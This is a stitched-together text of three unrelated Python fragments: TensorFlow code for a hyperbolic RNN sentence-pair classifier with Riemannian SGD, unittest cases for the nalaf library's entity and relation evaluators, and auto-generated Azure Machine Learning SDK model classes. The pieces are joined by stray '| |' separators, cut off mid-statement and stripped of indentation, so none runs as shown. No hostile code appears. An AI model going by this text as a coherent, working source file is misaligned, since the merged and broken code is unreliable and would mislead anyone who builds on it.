elif cell_type == 'gru' and sent_geom == 'hyp':
cell_class = lambda h_dim: rnn_impl.HypGRU(num_units=h_dim,
inputs_geom=inputs_geom,
bias_geom=bias_geom,
c_val=c_val,
non_lin=cell_non_lin,
fix_biases=fix_biases,
fix_matrices=fix_matrices,
matrices_init_eye=matrices_init_eye,
dtype=dtype)
else:
logger.error('Not valid cell type: %s and sent_geom %s' % (cell_type, sent_geom))
exit()
# RNN 1
with tf.variable_scope(cell_type + '1'):
word_embeddings_1 = tf.nn.embedding_lookup(self.embeddings, self.word_ids_1) # bs x num_w_s1 x dim
cell_1 = cell_class(self.dim)
initial_state_1 = cell_1.zero_state(self.batch_size, dtype)
outputs_1, state_1 = tf.nn.dynamic_rnn(cell=cell_1,
inputs=word_embeddings_1,
dtype=dtype,
initial_state=initial_state_1,
sequence_length=self.num_words_1)
if cell_type == 'TFlstm':
self.sent_1 = state_1[1]
else:
self.sent_1 = state_1
sent1_norm = util.tf_norm(self.sent_1)
# RNN 2
with tf.variable_scope(cell_type + '2'):
word_embeddings_2 = tf.nn.embedding_lookup(self.embeddings, self.word_ids_2)
# tf.summary.scalar('word_emb2', tf.reduce_mean(tf.norm(word_embeddings_2, axis=2)))
cell_2 = cell_class(self.dim)
initial_state_2 = cell_2.zero_state(self.batch_size, dtype)
outputs_2, state_2 = tf.nn.dynamic_rnn(cell=cell_2,
inputs=word_embeddings_2,
dtype=dtype,
initial_state=initial_state_2,
sequence_length=self.num_words_2)
if cell_type == 'TFlstm':
self.sent_2 = state_2[1]
else:
self.sent_2 = state_2
sent2_norm = util.tf_norm(self.sent_2)
tf.summary.scalar('RNN/word_emb1', tf.reduce_mean(tf.norm(word_embeddings_1, axis=2)))
tf.summary.scalar('RNN/sent1', tf.reduce_mean(sent1_norm))
tf.summary.scalar('RNN/sent2', tf.reduce_mean(sent2_norm))
eucl_vars += cell_1.eucl_vars + cell_2.eucl_vars
if sent_geom == 'hyp':
hyp_vars += cell_1.hyp_vars + cell_2.hyp_vars
## Compute d(s1, s2)
if sent_geom == 'eucl':
d_sq_s1_s2 = util.tf_euclid_dist_sq(self.sent_1, self.sent_2)
else:
d_sq_s1_s2 = util.tf_poinc_dist_sq(self.sent_1, self.sent_2, c = c_val)
##### Some summaries:
# For summaries and debugging, we need these:
pos_labels = tf.reshape(tf.cast(self.label_placeholder, tf.float64), [-1, 1])
neg_labels = 1. - pos_labels
weights_pos_labels = pos_labels / tf.reduce_sum(pos_labels)
weights_neg_labels = neg_labels / tf.reduce_sum(neg_labels)
################## first feed forward layer ###################
# Define variables for the first feed-forward layer: W1 * s1 + W2 * s2 + b + bd * d(s1,s2)
W_ff_s1 = tf.get_variable('W_ff_s1',
dtype=dtype,
shape=[self.dim, self.dim],
initializer= tf.contrib.layers.xavier_initializer())
W_ff_s2 = tf.get_variable('W_ff_s2',
dtype=dtype,
shape=[self.dim, self.dim],
initializer= tf.contrib.layers.xavier_initializer())
b_ff = tf.get_variable('b_ff',
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0))
b_ff_d = tf.get_variable('b_ff_d',
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0))
eucl_vars += [W_ff_s1, W_ff_s2]
if ffnn_geom == 'eucl' or bias_geom == 'eucl':
eucl_vars += [b_ff]
if additional_features == 'dsq':
eucl_vars += [b_ff_d]
else:
hyp_vars += [b_ff]
if additional_features == 'dsq':
hyp_vars += [b_ff_d]
if ffnn_geom == 'eucl' and sent_geom == 'hyp': # Sentence embeddings are Euclidean after log, except the proper distance (Eucl or hyp) is kept!
self.sent_1 = util.tf_log_map_zero(self.sent_1, c_val)
self.sent_2 = util.tf_log_map_zero(self.sent_2, c_val)
####### Build output_ffnn #######
if ffnn_geom == 'eucl':
output_ffnn = tf.matmul(self.sent_1, W_ff_s1) + tf.matmul(self.sent_2, W_ff_s2) + b_ff
if additional_features == 'dsq': # [u, v, d(u,v)^2]
output_ffnn = output_ffnn + d_sq_s1_s2 * b_ff_d
else:
assert sent_geom == 'hyp'
ffnn_s1 = util.tf_mob_mat_mul(W_ff_s1, self.sent_1, c_val)
ffnn_s2 = util.tf_mob_mat_mul(W_ff_s2, self.sent_2, c_val)
output_ffnn = util.tf_mob_add(ffnn_s1, ffnn_s2, c_val)
hyp_b_ff = b_ff
if bias_geom == 'eucl':
hyp_b_ff = util.tf_exp_map_zero(b_ff, c_val)
output_ffnn = util.tf_mob_add(output_ffnn, hyp_b_ff, c_val)
if additional_features == 'dsq': # [u, v, d(u,v)^2]
hyp_b_ff_d = b_ff_d
if bias_geom == 'eucl':
hyp_b_ff_d = util.tf_exp_map_zero(b_ff_d, c_val)
output_ffnn = util.tf_mob_add(output_ffnn,
util.tf_mob_scalar_mul(d_sq_s1_s2, hyp_b_ff_d, c_val),
c_val)
if ffnn_geom == 'eucl':
output_ffnn = util.tf_eucl_non_lin(output_ffnn, non_lin=ffnn_non_lin)
else:
output_ffnn = util.tf_hyp_non_lin(output_ffnn,
non_lin=ffnn_non_lin,
hyp_output = (mlr_geom == 'hyp' and dropout == 1.0),
c=c_val)
# Mobius dropout
if dropout < 1.0:
# If we are here, then output_ffnn should be Euclidean.
output_ffnn = tf.nn.dropout(output_ffnn, keep_prob=self.dropout_placeholder)
if (mlr_geom == 'hyp'):
output_ffnn = util.tf_exp_map_zero(output_ffnn, c_val)
################## MLR ###################
# output_ffnn is self.batch_size x self.dim
A_mlr = []
P_mlr = []
logits_list = []
for cl in range(num_classes):
A_mlr.append(tf.get_variable('A_mlr' + str(cl),
dtype=dtype,
shape=[1, self.dim],
initializer=tf.contrib.layers.xavier_initializer()))
eucl_vars += [A_mlr[cl]]
P_mlr.append(tf.get_variable('P_mlr' + str(cl),
dtype=dtype,
shape=[1, self.dim],
initializer=tf.constant_initializer(0.0)))
if mlr_geom == 'eucl':
eucl_vars += [P_mlr[cl]]
logits_list.append(tf.reshape(util.tf_dot(-P_mlr[cl] + output_ffnn, A_mlr[cl]), [-1]))
elif mlr_geom == 'hyp':
hyp_vars += [P_mlr[cl]]
minus_p_plus_x = util.tf_mob_add(-P_mlr[cl], output_ffnn, c_val)
norm_a = util.tf_norm(A_mlr[cl])
lambda_px = util.tf_lambda_x(minus_p_plus_x, c_val)
px_dot_a = util.tf_dot(minus_p_plus_x, tf.nn.l2_normalize(A_mlr[cl]))
logit = 2. / np.sqrt(c_val) * norm_a * tf.asinh(np.sqrt(c_val) * px_dot_a * lambda_px)
logits_list.append(tf.reshape(logit, [-1]))
self.logits = tf.stack(logits_list, axis=1)
self.argmax_idx = tf.argmax(self.logits, axis=1, output_type=tf.int32)
self.loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.label_placeholder,
logits=self.logits))
tf.summary.scalar('classif/unreg_loss', self.loss)
if reg_beta > 0.0:
assert num_classes == 2
distance_regularizer = tf.reduce_mean(
(tf.cast(self.label_placeholder, dtype=dtype) - 0.5) * d_sq_s1_s2)
self.loss = self.loss + reg_beta * distance_regularizer
self.acc = tf.reduce_mean(tf.to_float(tf.equal(self.argmax_idx, self.label_placeholder)))
tf.summary.scalar('classif/accuracy', self.acc)
######################################## OPTIMIZATION ######################################
all_updates_ops = []
###### Update Euclidean parameters using Adam.
optimizer_euclidean_params = tf.train.AdamOptimizer(learning_rate=1e-3)
eucl_grads = optimizer_euclidean_params.compute_gradients(self.loss, eucl_vars)
capped_eucl_gvs = [(tf.clip_by_norm(grad, 1.), var) for grad, var in eucl_grads] ###### Clip gradients
all_updates_ops.append(optimizer_euclidean_params.apply_gradients(capped_eucl_gvs))
###### Update Hyperbolic parameters, i.e. word embeddings and some biases in our case.
def rsgd(v, riemannian_g, learning_rate):
if hyp_opt == 'rsgd':
return util.tf_exp_map_x(v, -self.burn_in_factor * learning_rate * riemannian_g, c=c_val)
else:
# Use approximate RSGD based on a simple retraction.
updated_v = v - self.burn_in_factor * learning_rate * riemannian_g
# Projection op after SGD update. Need to make sure embeddings are inside the unit ball.
return util.tf_project_hyp_vecs(updated_v, c_val)
if inputs_geom == 'hyp':
grads_and_indices_hyp_words = tf.gradients(self.loss, self.embeddings)
grads_hyp_words = grads_and_indices_hyp_words[0].values
repeating_indices = grads_and_indices_hyp_words[0].indices
unique_indices, idx_in_repeating_indices = tf.unique(repeating_indices)
agg_gradients = tf.unsorted_segment_sum(grads_hyp_words,
idx_in_repeating_indices,
tf.shape(unique_indices)[0])
agg_gradients = tf.clip_by_norm(agg_gradients, 1.) ######## Clip gradients
unique_word_emb = tf.nn.embedding_lookup(self.embeddings, unique_indices) # no repetitions here
riemannian_rescaling_factor = util.riemannian_gradient_c(unique_word_emb, c=c_val)
rescaled_gradient = riemannian_rescaling_factor * agg_gradients
all_updates_ops.append(tf.scatter_update(self.embeddings,
unique_indices,
rsgd(unique_word_emb, rescaled_gradient, lr_words))) # Updated rarely
if len(hyp_vars) > 0:
hyp_grads = tf.gradients(self.loss, hyp_vars)
capped_hyp_grads = [tf.clip_by_norm(grad, 1.) for grad in hyp_grads] ###### Clip gradients
for i in range(len(hyp_vars)):
riemannian_rescaling_factor = util.riemannian_gradient_c(hyp_vars[i], c=c_val)
rescaled_gradient = riemannian_rescaling_factor * capped_hyp_grads[i]
all_updates_ops.append(tf.assign(hyp_vars[i], rsgd(hyp_vars[i], rescaled_gradient, lr_ffnn))) | |
import unittest
from nalaf.structures.data import Dataset, Document, Part, Entity, Relation
from nalaf.learning.evaluators import Evaluator, MentionLevelEvaluator, DocumentLevelRelationEvaluator
from nalaf.preprocessing.spliters import NLTKSplitter
from nalaf.preprocessing.tokenizers import NLTK_TOKENIZER
STUB_E_ID_1 = 'e_x_1'
STUB_E_ID_2 = 'e_x_2'
STUB_R_ID_1 = 'r_x_1'
class TestEvaluators(unittest.TestCase):
@classmethod
def setUpClass(cls):
# create a sample dataset1 (1) to test
cls.dataset1 = Dataset()
doc_1 = Document()
text = '.... aaaa .... bbbb .... cccc .... dddd .... eeee .... ffff .... gggg .... hhhh .... jjjj'
part_1 = Part(text)
cls.dataset1.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
exact_1 = Entity(STUB_E_ID_1, 5, 'aaaa')
exact_1.subclass = 1
exact_2 = Entity(STUB_E_ID_1, 55, 'ffff')
exact_2.subclass = 2
exact_3 = Entity(STUB_E_ID_1, 75, 'hhhh')
exact_3.subclass = 2
overlap_1_1 = Entity(STUB_E_ID_1, 25, 'cccc')
overlap_1_1.subclass = 1
overlap_1_2 = Entity(STUB_E_ID_1, 26, 'cc')
overlap_1_2.subclass = 1
overlap_2_1 = Entity(STUB_E_ID_1, 32, '.. ddd')
overlap_2_1.subclass = 2
overlap_2_2 = Entity(STUB_E_ID_1, 36, 'ddd ...')
overlap_2_2.subclass = 2
overlap_3_1 = Entity(STUB_E_ID_1, 65, 'gggg')
overlap_3_1.subclass = 1
overlap_3_2 = Entity(STUB_E_ID_1, 62, '.. gggg ..')
overlap_3_2.subclass = 2
missing_1 = Entity('e2', 45, 'eeee')
missing_1.subclass = 1
missing_2 = Entity('e2', 84, 'jjjj')
missing_2.subclass = 1
spurios = Entity('e2', 15, 'bbbb')
spurios.subclass = 1
part_1.annotations = [exact_1, exact_2, exact_3, overlap_1_1, overlap_2_1, overlap_3_1, missing_1, missing_2]
part_1.predicted_annotations = [exact_1, exact_2, exact_3, overlap_1_2, overlap_2_2, overlap_3_2, spurios]
def test_implements_evaluator_interface(self):
self.assertIsInstance(MentionLevelEvaluator(), Evaluator)
def test_exact_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp, 4) # the 3 overlapping + 1 spurious
self.assertEqual(evaluation.fn, 5) # the 3 overlapping + 2 missing
ret = evaluation.compute('exact')
self.assertEqual(ret.precision, 3 / 7)
self.assertEqual(ret.recall, 3 / 8)
self.assertEqual(ret.f_measure, 2 * (3 / 7 * 3 / 8) / (3 / 7 + 3 / 8))
def test_overlapping_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp - evaluation.fp_ov, 1) # the 1 spurious
self.assertEqual(evaluation.fn - evaluation.fn_ov, 2) # the 2 missing
self.assertEqual(evaluation.fp_ov, 3) # the 3 overlapping
self.assertEqual(evaluation.fn_ov, 3) # the 3 overlapping
ret = evaluation.compute('overlapping')
self.assertEqual(ret.precision, 9 / 10)
self.assertEqual(ret.recall, 9 / 11)
self.assertAlmostEqual(ret.f_measure, 2 * (9 / 10 * 9 / 11) / (9 / 10 + 9 / 11), places=5)
def test_half_overlapping_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp - evaluation.fp_ov, 1) # the 1 spurious
self.assertEqual(evaluation.fn - evaluation.fn_ov, 2) # the 2 missing
self.assertEqual(evaluation.fp_ov, 3) # the 3 overlapping
self.assertEqual(evaluation.fn_ov, 3) # the 3 overlapping
ret = evaluation.compute('half_overlapping')
self.assertEqual(ret.precision, (3 + 6 / 2) / 10)
self.assertEqual(ret.recall, (3 + 6 / 2) / 11)
self.assertEqual(ret.f_measure, 2 * ((3 + 6 / 2) / 10 * (3 + 6 / 2) / 11) / ((3 + 6 / 2) / 10 + (3 + 6 / 2) / 11))
def test_exception_on_equality_operator(self):
ann_1 = Entity(STUB_E_ID_1, 1, 'text_1')
ann_2 = Entity(STUB_E_ID_1, 2, 'text_2')
Entity.equality_operator = 'not valid'
self.assertRaises(ValueError, lambda: ann_1 == ann_2)
def test_exception_on_strictness(self):
evaluator = MentionLevelEvaluator() # this is fine
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL) # this is fine
self.assertRaises(ValueError, evaluation.compute, 'strictness not valid')
def test_subclass_analysis(self):
evaluator = MentionLevelEvaluator(subclass_analysis=True)
evaluations = evaluator.evaluate(self.dataset1)
self.assertEqual(evaluations(1).tp, 1)
self.assertEqual(evaluations(2).tp, 2)
self.assertEqual(evaluations(1).fp, 3)
self.assertEqual(evaluations(2).fp, 1)
self.assertEqual(evaluations(1).fn, 4)
self.assertEqual(evaluations(2).fn, 1)
self.assertEqual(evaluations(1).fp_ov, 2)
self.assertEqual(evaluations(1).fn_ov, 2)
self.assertEqual(evaluations(2).fp_ov, 1)
self.assertEqual(evaluations(2).fn_ov, 1)
# -------
def _apply_pipeline(self, dataset):
# Apply through pipeline
NLTKSplitter().split(dataset)
NLTK_TOKENIZER.tokenize(dataset)
# nlp = get_spacy_nlp_english(load_parser=False)
# cls.parser = SpacyParser(nlp)
# cls.parser.parse(cls.dataset)
return dataset
def test_DocumentLevelRelationEvaluator_default_entities_case_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
# -
part_1.predicted_relations = [
# empty
]
self._apply_pipeline(dataset)
# -
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
# ---
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "tool"),
Entity(STUB_E_ID_2, 0, "MAYNARD")
),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_order_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_2, 0, "maynard"),
Entity(STUB_E_ID_1, 0, "TOOL")
),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_false_positives(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_ PART *1*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_2 = Part('_irrelevant_ PART *2*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_2'] = part_2
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "Maynard")),
]
# -
part_2.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_2, 0, "TOOL"), Entity(STUB_E_ID_1, 0, "Snoop Dog")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
def test_DocumentLevelRelationEvaluator_parts_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_ PART *1*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_2 = Part('_irrelevant_ PART *2*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_2'] = part_2
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
]
# -
part_2.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_2, 0, "maynard"), Entity(STUB_E_ID_1, 0, "TOOL")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_repeated_relations_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "<NAME>")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 1, "TOOL"), Entity(STUB_E_ID_2, 1, "<NAME>")),
]
# -
part_1.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 1, "TOOL"), Entity(STUB_E_ID_2, 1, "maynard")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.6666666666666666)
# -
part_1.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 2, "TOOL"), Entity(STUB_E_ID_2, 2, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 3, "TOOL"), Entity(STUB_E_ID_2, 3, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 4, "TOOL"), Entity(STUB_E_ID_2, 4, "<NAME>")),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 2)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_normalized_entities(self):
evaluator = DocumentLevelRelationEvaluator(
rel_type=STUB_R_ID_1,
entity_map_fun=DocumentLevelRelationEvaluator.COMMON_ENTITY_MAP_FUNS['normalized_fun'](
{STUB_E_ID_1: 'n_1', STUB_E_ID_2: 'n_1'},
penalize_unknown_normalizations="no")
)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "1964"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_1": "1961"})),
]
# -
part_1.predicted_relations = [
Relation(
# One without normalization, one with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool"),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_x": "1961"})),
Relation(
# One with different normalization, one with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "666"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_x": "1961"})),
Relation(
# Both with the correct normalization ids, but one has wrong normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "666"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_1": "1961"})),
Relation(
# Both with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_another_key": "1964"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_another_key": "1961"})),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool band", norms={"n_1": "1964"}),
Entity(STUB_E_ID_2, 0, "<NAME>", norms={"n_1": "1961"})),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def _create_basic_dataset(self):
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
self._apply_pipeline(dataset)
return (dataset, part_1)
def test_DocumentLevelRelationEvaluator_arbitrary_relation_accept_fun_order_does_not_matter(self):
entity_map_fun = (lambda e: "SAME")
def relation_accept_fun(gold, pred):
print('gold:', gold, ' <---> ', 'pred:', pred)
return gold == pred
r1 = Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "yin"), Entity(STUB_E_ID_2, 0, "yan"))
r2 = Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "yan"), Entity(STUB_E_ID_2, 0, "yin"))
self.assertTrue(relation_accept_fun(r1.map(entity_map_fun), r1.map(entity_map_fun)))
self.assertTrue(relation_accept_fun(r1.map(entity_map_fun), r2.map(entity_map_fun)))
self.assertTrue(relation_accept_fun(r2.map(entity_map_fun), r1.map(entity_map_fun)))
evaluator = DocumentLevelRelationEvaluator(STUB_R_ID_1, entity_map_fun, relation_accept_fun)
(dataset, part) = self._create_basic_dataset()
# -
part.relations = [r1]
part.predicted_relations = [r1]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
print(evaluation)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_arbitrary_relation_accept_fun_order_matters(self):
entity_map_fun = (lambda | |
'type': 'OperationDisplay'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["OperationDisplay"] = None,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
class OperationDisplay(msrest.serialization.Model):
"""Display name of operation.
:param provider: The resource provider name: Microsoft.MachineLearningExperimentation.
:type provider: str
:param resource: The resource on which the operation is performed.
:type resource: str
:param operation: The operation that users can perform.
:type operation: str
:param description: The description for the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationListResult(msrest.serialization.Model):
"""An array of operations supported by the resource provider.
:param value: List of AML workspace operations supported by the AML workspace resource
provider.
:type value: list[~azure.mgmt.machinelearningservices.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
*,
value: Optional[List["Operation"]] = None,
**kwargs
):
super(OperationListResult, self).__init__(**kwargs)
self.value = value
class PaginatedComputeResourcesList(msrest.serialization.Model):
"""Paginated list of Machine Learning compute objects wrapped in ARM resource envelope.
:param value: An array of Machine Learning compute objects wrapped in ARM resource envelope.
:type value: list[~azure.mgmt.machinelearningservices.models.ComputeResource]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ComputeResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ComputeResource"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedComputeResourcesList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class PaginatedWorkspaceConnectionsList(msrest.serialization.Model):
"""Paginated list of Workspace connection objects.
:param value: An array of Workspace connection objects.
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceConnection]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceConnection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedWorkspaceConnectionsList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class Password(msrest.serialization.Model):
"""Password.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name:
:vartype name: str
:ivar value:
:vartype value: str
"""
_validation = {
'name': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Password, self).__init__(**kwargs)
self.name = None
self.value = None
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(msrest.serialization.Model):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the private endpoint connection.
:vartype id: str
:ivar name: Friendly name of the private endpoint connection.
:vartype name: str
:ivar type: Resource type of private endpoint connection.
:vartype type: str
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~azure.mgmt.machinelearningservices.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~azure.mgmt.machinelearningservices.models.PrivateLinkServiceConnectionState
